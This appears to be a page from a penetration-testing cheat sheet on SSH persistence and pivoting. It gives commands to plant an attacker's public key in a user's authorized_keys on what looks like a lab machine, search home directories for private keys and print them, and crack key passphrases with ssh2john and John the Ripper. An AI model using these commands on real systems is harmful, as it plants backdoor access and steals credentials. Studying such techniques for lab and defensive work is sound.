Pivoting/Lateral Movement

Persistence

Pivoting to SSH

SSH Key Injection

Generate SSH Keys
ssh-keygen -t ed25519 -f key

  • If authorized_keys file doesn't exist create one with your public key:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" > /home/dvir/.ssh/authorized_keys

  • Other wise append your public key:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" >> /home/dvir/.ssh/authorized_keys

  • Now just connect with your private key:

ssh -i key dvir@10.10.11.8

Using Existing keys

Look for the private key
find /home/user -name "id_*" -exec cat {} \;

  • Once you find it, just copy the key in your .ssh directory and ssh in.

  • Also you can, check If the Corresponding private/public Key is known by using this repo.

Crack the passphrase

  • Once you got the private key, you can use ssh2john to generate a hash from the key:

ssh2john private_key > private_key.hash

  • Then feed this hash into John the Ripper:

john private_key.hash --wordlist=/path/to/wordlist

PreviousFile TransferNextLinux Privilege Scalation

Last updated